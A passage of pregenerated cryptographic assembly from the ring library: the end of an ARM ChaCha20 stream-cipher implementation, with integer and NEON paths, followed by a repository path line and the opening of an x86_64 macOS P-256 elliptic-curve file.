itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r1,[r14,#-12]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-8]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r3,[r14,#-4]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-15]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r1,[r14,#-11]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-7]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r3,[r14,#-3]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-14]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r1,[r14,#-10]
strb r2,[r14,#-6]
eor r0,r8,r0,lsr#8
strb r3,[r14,#-2]
eor r1,r9,r1,lsr#8
strb r0,[r14,#-13]
eor r2,r10,r2,lsr#8
strb r1,[r14,#-9]
eor r3,r11,r3,lsr#8
strb r2,[r14,#-5]
strb r3,[r14,#-1]
add r8,sp,#4*(4+0)
ldmia r8,{r8,r9,r10,r11} @ load key material
add r0,sp,#4*(16+8)
add r4,r4,r8 @ accumulate key material
add r5,r5,r9
add r6,r6,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r7,r7,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r4,r8,r4 @ xor with input (or zero)
eor r5,r9,r5
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r6,r10,r6
strb r4,[r14],#16 @ store output
eor r7,r11,r7
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r5,[r14,#-12]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-8]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r7,[r14,#-4]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-15]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r5,[r14,#-11]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-7]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r7,[r14,#-3]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-14]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r5,[r14,#-10]
strb r6,[r14,#-6]
eor r4,r8,r4,lsr#8
strb r7,[r14,#-2]
eor r5,r9,r5,lsr#8
strb r4,[r14,#-13]
eor r6,r10,r6,lsr#8
strb r5,[r14,#-9]
eor r7,r11,r7,lsr#8
strb r6,[r14,#-5]
strb r7,[r14,#-1]
add r8,sp,#4*(4+4)
ldmia r8,{r8,r9,r10,r11} @ load key material
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
# ifdef __thumb2__
itt hi
# endif
strhi r10,[sp,#4*(16+10)] @ copy "rx"
strhi r11,[sp,#4*(16+11)] @ copy "rx"
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
add r2,r2,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r3,r3,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r0,r8,r0 @ xor with input (or zero)
eor r1,r9,r1
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r2,r10,r2
strb r0,[r14],#16 @ store output
eor r3,r11,r3
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r1,[r14,#-12]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-8]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r3,[r14,#-4]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-15]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r1,[r14,#-11]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-7]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r3,[r14,#-3]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-14]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r1,[r14,#-10]
strb r2,[r14,#-6]
eor r0,r8,r0,lsr#8
strb r3,[r14,#-2]
eor r1,r9,r1,lsr#8
strb r0,[r14,#-13]
eor r2,r10,r2,lsr#8
strb r1,[r14,#-9]
eor r3,r11,r3,lsr#8
strb r2,[r14,#-5]
strb r3,[r14,#-1]
add r8,sp,#4*(4+8)
ldmia r8,{r8,r9,r10,r11} @ load key material
add r4,r4,r8 @ accumulate key material
# ifdef __thumb2__
itt hi
# endif
addhi r8,r8,#1 @ next counter value
strhi r8,[sp,#4*(12)] @ save next counter value
add r5,r5,r9
add r6,r6,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r7,r7,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r4,r8,r4 @ xor with input (or zero)
eor r5,r9,r5
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r6,r10,r6
strb r4,[r14],#16 @ store output
eor r7,r11,r7
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r5,[r14,#-12]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-8]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r7,[r14,#-4]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-15]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r5,[r14,#-11]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-7]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r7,[r14,#-3]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-14]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r5,[r14,#-10]
strb r6,[r14,#-6]
eor r4,r8,r4,lsr#8
strb r7,[r14,#-2]
eor r5,r9,r5,lsr#8
strb r4,[r14,#-13]
eor r6,r10,r6,lsr#8
strb r5,[r14,#-9]
eor r7,r11,r7,lsr#8
strb r6,[r14,#-5]
strb r7,[r14,#-1]
# ifdef __thumb2__
it ne
# endif
ldrne r8,[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
it hs
# endif
subhs r11,r8,#64 @ len-=64
bhi .Loop_outer
beq .Ldone
#endif
.Ltail:
ldr r12,[sp,#4*(32+1)] @ load inp
add r9,sp,#4*(0)
ldr r14,[sp,#4*(32+0)] @ load out
.Loop_tail:
ldrb r10,[r9],#1 @ read buffer on stack
ldrb r11,[r12],#1 @ read input
subs r8,r8,#1
eor r11,r11,r10
strb r11,[r14],#1 @ store output
bne .Loop_tail
.Ldone:
add sp,sp,#4*(32+3)
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,pc}
.size ChaCha20_ctr32_nohw,.-ChaCha20_ctr32_nohw
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.globl ChaCha20_ctr32_neon
.hidden ChaCha20_ctr32_neon
.type ChaCha20_ctr32_neon,%function
.align 5
ChaCha20_ctr32_neon:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0,r1,r2,r4-r11,lr}
adr r14,.Lsigma
vstmdb sp!,{d8,d9,d10,d11,d12,d13,d14,d15} @ ABI spec says so
stmdb sp!,{r0,r1,r2,r3}
vld1.32 {q1,q2},[r3] @ load key
ldmia r3,{r4,r5,r6,r7,r8,r9,r10,r11} @ load key
sub sp,sp,#4*(16+16)
vld1.32 {q3},[r12] @ load counter and nonce
add r12,sp,#4*8
ldmia r14,{r0,r1,r2,r3} @ load sigma
vld1.32 {q0},[r14]! @ load sigma
vld1.32 {q12},[r14] @ one
vst1.32 {q2,q3},[r12] @ copy 1/2key|counter|nonce
vst1.32 {q0,q1},[sp] @ copy sigma|1/2key
str r10,[sp,#4*(16+10)] @ off-load "rx"
str r11,[sp,#4*(16+11)] @ off-load "rx"
vshl.i32 d26,d24,#1 @ two
vstr d24,[sp,#4*(16+0)]
vshl.i32 d28,d24,#2 @ four
vstr d26,[sp,#4*(16+2)]
vmov q4,q0
vstr d28,[sp,#4*(16+4)]
vmov q8,q0
vmov q5,q1
vmov q9,q1
b .Loop_neon_enter
.align 4
.Loop_neon_outer:
ldmia sp,{r0,r1,r2,r3,r4,r5,r6,r7,r8,r9} @ load key material
cmp r11,#64*2 @ if len<=64*2
bls .Lbreak_neon @ switch to integer-only
vmov q4,q0
str r11,[sp,#4*(32+2)] @ save len
vmov q8,q0
str r12, [sp,#4*(32+1)] @ save inp
vmov q5,q1
str r14, [sp,#4*(32+0)] @ save out
vmov q9,q1
.Loop_neon_enter:
ldr r11, [sp,#4*(15)]
vadd.i32 q7,q3,q12 @ counter+1
ldr r12,[sp,#4*(12)] @ modulo-scheduled load
vmov q6,q2
ldr r10, [sp,#4*(13)]
vmov q10,q2
ldr r14,[sp,#4*(14)]
vadd.i32 q11,q7,q12 @ counter+2
str r11, [sp,#4*(16+15)]
mov r11,#10
add r12,r12,#3 @ counter+3
b .Loop_neon
.align 4
.Loop_neon:
subs r11,r11,#1
vadd.i32 q0,q0,q1
add r0,r0,r4
vadd.i32 q4,q4,q5
mov r12,r12,ror#16
vadd.i32 q8,q8,q9
add r1,r1,r5
veor q3,q3,q0
mov r10,r10,ror#16
veor q7,q7,q4
eor r12,r12,r0,ror#16
veor q11,q11,q8
eor r10,r10,r1,ror#16
vrev32.16 q3,q3
add r8,r8,r12
vrev32.16 q7,q7
mov r4,r4,ror#20
vrev32.16 q11,q11
add r9,r9,r10
vadd.i32 q2,q2,q3
mov r5,r5,ror#20
vadd.i32 q6,q6,q7
eor r4,r4,r8,ror#20
vadd.i32 q10,q10,q11
eor r5,r5,r9,ror#20
veor q12,q1,q2
add r0,r0,r4
veor q13,q5,q6
mov r12,r12,ror#24
veor q14,q9,q10
add r1,r1,r5
vshr.u32 q1,q12,#20
mov r10,r10,ror#24
vshr.u32 q5,q13,#20
eor r12,r12,r0,ror#24
vshr.u32 q9,q14,#20
eor r10,r10,r1,ror#24
vsli.32 q1,q12,#12
add r8,r8,r12
vsli.32 q5,q13,#12
mov r4,r4,ror#25
vsli.32 q9,q14,#12
add r9,r9,r10
vadd.i32 q0,q0,q1
mov r5,r5,ror#25
vadd.i32 q4,q4,q5
str r10,[sp,#4*(16+13)]
vadd.i32 q8,q8,q9
ldr r10,[sp,#4*(16+15)]
veor q12,q3,q0
eor r4,r4,r8,ror#25
veor q13,q7,q4
eor r5,r5,r9,ror#25
veor q14,q11,q8
str r8,[sp,#4*(16+8)]
vshr.u32 q3,q12,#24
ldr r8,[sp,#4*(16+10)]
vshr.u32 q7,q13,#24
add r2,r2,r6
vshr.u32 q11,q14,#24
mov r14,r14,ror#16
vsli.32 q3,q12,#8
str r9,[sp,#4*(16+9)]
vsli.32 q7,q13,#8
ldr r9,[sp,#4*(16+11)]
vsli.32 q11,q14,#8
add r3,r3,r7
vadd.i32 q2,q2,q3
mov r10,r10,ror#16
vadd.i32 q6,q6,q7
eor r14,r14,r2,ror#16
vadd.i32 q10,q10,q11
eor r10,r10,r3,ror#16
veor q12,q1,q2
add r8,r8,r14
veor q13,q5,q6
mov r6,r6,ror#20
veor q14,q9,q10
add r9,r9,r10
vshr.u32 q1,q12,#25
mov r7,r7,ror#20
vshr.u32 q5,q13,#25
eor r6,r6,r8,ror#20
vshr.u32 q9,q14,#25
eor r7,r7,r9,ror#20
vsli.32 q1,q12,#7
add r2,r2,r6
vsli.32 q5,q13,#7
mov r14,r14,ror#24
vsli.32 q9,q14,#7
add r3,r3,r7
vext.8 q2,q2,q2,#8
mov r10,r10,ror#24
vext.8 q6,q6,q6,#8
eor r14,r14,r2,ror#24
vext.8 q10,q10,q10,#8
eor r10,r10,r3,ror#24
vext.8 q1,q1,q1,#4
add r8,r8,r14
vext.8 q5,q5,q5,#4
mov r6,r6,ror#25
vext.8 q9,q9,q9,#4
add r9,r9,r10
vext.8 q3,q3,q3,#12
mov r7,r7,ror#25
vext.8 q7,q7,q7,#12
eor r6,r6,r8,ror#25
vext.8 q11,q11,q11,#12
eor r7,r7,r9,ror#25
vadd.i32 q0,q0,q1
add r0,r0,r5
vadd.i32 q4,q4,q5
mov r10,r10,ror#16
vadd.i32 q8,q8,q9
add r1,r1,r6
veor q3,q3,q0
mov r12,r12,ror#16
veor q7,q7,q4
eor r10,r10,r0,ror#16
veor q11,q11,q8
eor r12,r12,r1,ror#16
vrev32.16 q3,q3
add r8,r8,r10
vrev32.16 q7,q7
mov r5,r5,ror#20
vrev32.16 q11,q11
add r9,r9,r12
vadd.i32 q2,q2,q3
mov r6,r6,ror#20
vadd.i32 q6,q6,q7
eor r5,r5,r8,ror#20
vadd.i32 q10,q10,q11
eor r6,r6,r9,ror#20
veor q12,q1,q2
add r0,r0,r5
veor q13,q5,q6
mov r10,r10,ror#24
veor q14,q9,q10
add r1,r1,r6
vshr.u32 q1,q12,#20
mov r12,r12,ror#24
vshr.u32 q5,q13,#20
eor r10,r10,r0,ror#24
vshr.u32 q9,q14,#20
eor r12,r12,r1,ror#24
vsli.32 q1,q12,#12
add r8,r8,r10
vsli.32 q5,q13,#12
mov r5,r5,ror#25
vsli.32 q9,q14,#12
str r10,[sp,#4*(16+15)]
vadd.i32 q0,q0,q1
ldr r10,[sp,#4*(16+13)]
vadd.i32 q4,q4,q5
add r9,r9,r12
vadd.i32 q8,q8,q9
mov r6,r6,ror#25
veor q12,q3,q0
eor r5,r5,r8,ror#25
veor q13,q7,q4
eor r6,r6,r9,ror#25
veor q14,q11,q8
str r8,[sp,#4*(16+10)]
vshr.u32 q3,q12,#24
ldr r8,[sp,#4*(16+8)]
vshr.u32 q7,q13,#24
add r2,r2,r7
vshr.u32 q11,q14,#24
mov r10,r10,ror#16
vsli.32 q3,q12,#8
str r9,[sp,#4*(16+11)]
vsli.32 q7,q13,#8
ldr r9,[sp,#4*(16+9)]
vsli.32 q11,q14,#8
add r3,r3,r4
vadd.i32 q2,q2,q3
mov r14,r14,ror#16
vadd.i32 q6,q6,q7
eor r10,r10,r2,ror#16
vadd.i32 q10,q10,q11
eor r14,r14,r3,ror#16
veor q12,q1,q2
add r8,r8,r10
veor q13,q5,q6
mov r7,r7,ror#20
veor q14,q9,q10
add r9,r9,r14
vshr.u32 q1,q12,#25
mov r4,r4,ror#20
vshr.u32 q5,q13,#25
eor r7,r7,r8,ror#20
vshr.u32 q9,q14,#25
eor r4,r4,r9,ror#20
vsli.32 q1,q12,#7
add r2,r2,r7
vsli.32 q5,q13,#7
mov r10,r10,ror#24
vsli.32 q9,q14,#7
add r3,r3,r4
vext.8 q2,q2,q2,#8
mov r14,r14,ror#24
vext.8 q6,q6,q6,#8
eor r10,r10,r2,ror#24
vext.8 q10,q10,q10,#8
eor r14,r14,r3,ror#24
vext.8 q1,q1,q1,#12
add r8,r8,r10
vext.8 q5,q5,q5,#12
mov r7,r7,ror#25
vext.8 q9,q9,q9,#12
add r9,r9,r14
vext.8 q3,q3,q3,#4
mov r4,r4,ror#25
vext.8 q7,q7,q7,#4
eor r7,r7,r8,ror#25
vext.8 q11,q11,q11,#4
eor r4,r4,r9,ror#25
bne .Loop_neon
add r11,sp,#32
vld1.32 {q12,q13},[sp] @ load key material
vld1.32 {q14,q15},[r11]
ldr r11,[sp,#4*(32+2)] @ load len
str r8, [sp,#4*(16+8)] @ modulo-scheduled store
str r9, [sp,#4*(16+9)]
str r12,[sp,#4*(16+12)]
str r10, [sp,#4*(16+13)]
str r14,[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ rx and second half at sp+4*(16+8)
ldr r12,[sp,#4*(32+1)] @ load inp
ldr r14,[sp,#4*(32+0)] @ load out
vadd.i32 q0,q0,q12 @ accumulate key material
vadd.i32 q4,q4,q12
vadd.i32 q8,q8,q12
vldr d24,[sp,#4*(16+0)] @ one
vadd.i32 q1,q1,q13
vadd.i32 q5,q5,q13
vadd.i32 q9,q9,q13
vldr d26,[sp,#4*(16+2)] @ two
vadd.i32 q2,q2,q14
vadd.i32 q6,q6,q14
vadd.i32 q10,q10,q14
vadd.i32 d14,d14,d24 @ counter+1
vadd.i32 d22,d22,d26 @ counter+2
vadd.i32 q3,q3,q15
vadd.i32 q7,q7,q15
vadd.i32 q11,q11,q15
cmp r11,#64*4
blo .Ltail_neon
vld1.8 {q12,q13},[r12]! @ load input
mov r11,sp
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12 @ xor with input
veor q1,q1,q13
vld1.8 {q12,q13},[r12]!
veor q2,q2,q14
veor q3,q3,q15
vld1.8 {q14,q15},[r12]!
veor q4,q4,q12
vst1.8 {q0,q1},[r14]! @ store output
veor q5,q5,q13
vld1.8 {q12,q13},[r12]!
veor q6,q6,q14
vst1.8 {q2,q3},[r14]!
veor q7,q7,q15
vld1.8 {q14,q15},[r12]!
veor q8,q8,q12
vld1.32 {q0,q1},[r11]! @ load for next iteration
veor d25,d25,d25
vldr d24,[sp,#4*(16+4)] @ four
veor q9,q9,q13
vld1.32 {q2,q3},[r11]
veor q10,q10,q14
vst1.8 {q4,q5},[r14]!
veor q11,q11,q15
vst1.8 {q6,q7},[r14]!
vadd.i32 d6,d6,d24 @ next counter value
vldr d24,[sp,#4*(16+0)] @ one
ldmia sp,{r8,r9,r10,r11} @ load key material
add r0,r0,r8 @ accumulate key material
ldr r8,[r12],#16 @ load input
vst1.8 {q8,q9},[r14]!
add r1,r1,r9
ldr r9,[r12,#-12]
vst1.8 {q10,q11},[r14]!
add r2,r2,r10
ldr r10,[r12,#-8]
add r3,r3,r11
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
eor r0,r0,r8 @ xor with input
add r8,sp,#4*(4)
eor r1,r1,r9
str r0,[r14],#16 @ store output
eor r2,r2,r10
str r1,[r14,#-12]
eor r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
ldr r8,[r12],#16 @ load input
add r5,r5,r9
ldr r9,[r12,#-12]
add r6,r6,r10
ldr r10,[r12,#-8]
add r7,r7,r11
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
eor r4,r4,r8
add r8,sp,#4*(8)
eor r5,r5,r9
str r4,[r14],#16 @ store output
eor r6,r6,r10
str r5,[r14,#-12]
eor r7,r7,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r6,[r14,#-8]
add r0,sp,#4*(16+8)
str r7,[r14,#-4]
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
add r0,r0,r8 @ accumulate key material
ldr r8,[r12],#16 @ load input
add r1,r1,r9
ldr r9,[r12,#-12]
# ifdef __thumb2__
it hi
# endif
strhi r10,[sp,#4*(16+10)] @ copy "rx" while at it
add r2,r2,r10
ldr r10,[r12,#-8]
# ifdef __thumb2__
it hi
# endif
strhi r11,[sp,#4*(16+11)] @ copy "rx" while at it
add r3,r3,r11
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
eor r0,r0,r8
add r8,sp,#4*(12)
eor r1,r1,r9
str r0,[r14],#16 @ store output
eor r2,r2,r10
str r1,[r14,#-12]
eor r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
add r8,r8,#4 @ next counter value
add r5,r5,r9
str r8,[sp,#4*(12)] @ save next counter value
ldr r8,[r12],#16 @ load input
add r6,r6,r10
add r4,r4,#3 @ counter+3
ldr r9,[r12,#-12]
add r7,r7,r11
ldr r10,[r12,#-8]
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
eor r4,r4,r8
# ifdef __thumb2__
it hi
# endif
ldrhi r8,[sp,#4*(32+2)] @ re-load len
eor r5,r5,r9
eor r6,r6,r10
str r4,[r14],#16 @ store output
eor r7,r7,r11
str r5,[r14,#-12]
sub r11,r8,#64*4 @ len-=64*4
str r6,[r14,#-8]
str r7,[r14,#-4]
bhi .Loop_neon_outer
b .Ldone_neon
.align 4
.Lbreak_neon:
@ harmonize NEON and integer-only stack frames: load data
@ from NEON frame, but save to integer-only one; distance
@ between the two is 4*(32+4+16-32)=4*(20).
str r11, [sp,#4*(20+32+2)] @ save len
add r11,sp,#4*(32+4)
str r12, [sp,#4*(20+32+1)] @ save inp
str r14, [sp,#4*(20+32+0)] @ save out
ldr r12,[sp,#4*(16+10)]
ldr r14,[sp,#4*(16+11)]
vldmia r11,{d8,d9,d10,d11,d12,d13,d14,d15} @ fulfill ABI requirement
str r12,[sp,#4*(20+16+10)] @ copy "rx"
str r14,[sp,#4*(20+16+11)] @ copy "rx"
ldr r11, [sp,#4*(15)]
ldr r12,[sp,#4*(12)] @ modulo-scheduled load
ldr r10, [sp,#4*(13)]
ldr r14,[sp,#4*(14)]
str r11, [sp,#4*(20+16+15)]
add r11,sp,#4*(20)
vst1.32 {q0,q1},[r11]! @ copy key
add sp,sp,#4*(20) @ switch frame
vst1.32 {q2,q3},[r11]
mov r11,#10
b .Loop @ go integer-only
.align 4
.Ltail_neon:
cmp r11,#64*3
bhs .L192_or_more_neon
cmp r11,#64*2
bhs .L128_or_more_neon
cmp r11,#64*1
bhs .L64_or_more_neon
add r8,sp,#4*(8)
vst1.8 {q0,q1},[sp]
add r10,sp,#4*(0)
vst1.8 {q2,q3},[r8]
b .Loop_tail_neon
.align 4
.L64_or_more_neon:
vld1.8 {q12,q13},[r12]!
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12
veor q1,q1,q13
veor q2,q2,q14
veor q3,q3,q15
vst1.8 {q0,q1},[r14]!
vst1.8 {q2,q3},[r14]!
beq .Ldone_neon
add r8,sp,#4*(8)
vst1.8 {q4,q5},[sp]
add r10,sp,#4*(0)
vst1.8 {q6,q7},[r8]
sub r11,r11,#64*1 @ len-=64*1
b .Loop_tail_neon
.align 4
.L128_or_more_neon:
vld1.8 {q12,q13},[r12]!
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12
veor q1,q1,q13
vld1.8 {q12,q13},[r12]!
veor q2,q2,q14
veor q3,q3,q15
vld1.8 {q14,q15},[r12]!
veor q4,q4,q12
veor q5,q5,q13
vst1.8 {q0,q1},[r14]!
veor q6,q6,q14
vst1.8 {q2,q3},[r14]!
veor q7,q7,q15
vst1.8 {q4,q5},[r14]!
vst1.8 {q6,q7},[r14]!
beq .Ldone_neon
add r8,sp,#4*(8)
vst1.8 {q8,q9},[sp]
add r10,sp,#4*(0)
vst1.8 {q10,q11},[r8]
sub r11,r11,#64*2 @ len-=64*2
b .Loop_tail_neon
.align 4
.L192_or_more_neon:
vld1.8 {q12,q13},[r12]!
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12
veor q1,q1,q13
vld1.8 {q12,q13},[r12]!
veor q2,q2,q14
veor q3,q3,q15
vld1.8 {q14,q15},[r12]!
veor q4,q4,q12
veor q5,q5,q13
vld1.8 {q12,q13},[r12]!
veor q6,q6,q14
vst1.8 {q0,q1},[r14]!
veor q7,q7,q15
vld1.8 {q14,q15},[r12]!
veor q8,q8,q12
vst1.8 {q2,q3},[r14]!
veor q9,q9,q13
vst1.8 {q4,q5},[r14]!
veor q10,q10,q14
vst1.8 {q6,q7},[r14]!
veor q11,q11,q15
vst1.8 {q8,q9},[r14]!
vst1.8 {q10,q11},[r14]!
beq .Ldone_neon
ldmia sp,{r8,r9,r10,r11} @ load key material
add r0,r0,r8 @ accumulate key material
add r8,sp,#4*(4)
add r1,r1,r9
add r2,r2,r10
add r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
add r4,r4,r8 @ accumulate key material
add r8,sp,#4*(8)
add r5,r5,r9
add r6,r6,r10
add r7,r7,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
stmia sp,{r0,r1,r2,r3,r4,r5,r6,r7}
add r0,sp,#4*(16+8)
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
add r0,r0,r8 @ accumulate key material
add r8,sp,#4*(12)
add r1,r1,r9
add r2,r2,r10
add r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
add r4,r4,r8 @ accumulate key material
add r8,sp,#4*(8)
add r5,r5,r9
add r4,r4,#3 @ counter+3
add r6,r6,r10
add r7,r7,r11
ldr r11,[sp,#4*(32+2)] @ re-load len
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
stmia r8,{r0,r1,r2,r3,r4,r5,r6,r7}
add r10,sp,#4*(0)
sub r11,r11,#64*3 @ len-=64*3
.Loop_tail_neon:
ldrb r8,[r10],#1 @ read buffer on stack
ldrb r9,[r12],#1 @ read input
subs r11,r11,#1
eor r8,r8,r9
strb r8,[r14],#1 @ store output
bne .Loop_tail_neon
.Ldone_neon:
add sp,sp,#4*(32+4)
vldmia sp,{d8,d9,d10,d11,d12,d13,d14,d15}
add sp,sp,#4*(16+3)
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,pc}
.size ChaCha20_ctr32_neon,.-ChaCha20_ctr32_neon
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_ARM) && defined(__ELF__)
|
mi2bjss/Pressel-site | 68,707 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/p256-x86_64-asm-macosx.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86_64) && defined(__APPLE__)
.text
.section __DATA,__const
.p2align 6
L$poly:
.quad 0xffffffffffffffff, 0x00000000ffffffff, 0x0000000000000000, 0xffffffff00000001
L$One:
.long 1,1,1,1,1,1,1,1
L$Two:
.long 2,2,2,2,2,2,2,2
L$Three:
.long 3,3,3,3,3,3,3,3
L$ONE_mont:
.quad 0x0000000000000001, 0xffffffff00000000, 0xffffffffffffffff, 0x00000000fffffffe
L$ord:
.quad 0xf3b9cac2fc632551, 0xbce6faada7179e84, 0xffffffffffffffff, 0xffffffff00000000
L$ordK:
.quad 0xccd1c8aaee00bc4f
.text
.globl _ecp_nistz256_neg
.private_extern _ecp_nistz256_neg
.p2align 5
_ecp_nistz256_neg:
_CET_ENDBR
pushq %r12
pushq %r13
L$neg_body:
xorq %r8,%r8
xorq %r9,%r9
xorq %r10,%r10
xorq %r11,%r11
xorq %r13,%r13
subq 0(%rsi),%r8
sbbq 8(%rsi),%r9
sbbq 16(%rsi),%r10
movq %r8,%rax
sbbq 24(%rsi),%r11
leaq L$poly(%rip),%rsi
movq %r9,%rdx
sbbq $0,%r13
addq 0(%rsi),%r8
movq %r10,%rcx
adcq 8(%rsi),%r9
adcq 16(%rsi),%r10
movq %r11,%r12
adcq 24(%rsi),%r11
testq %r13,%r13
cmovzq %rax,%r8
cmovzq %rdx,%r9
movq %r8,0(%rdi)
cmovzq %rcx,%r10
movq %r9,8(%rdi)
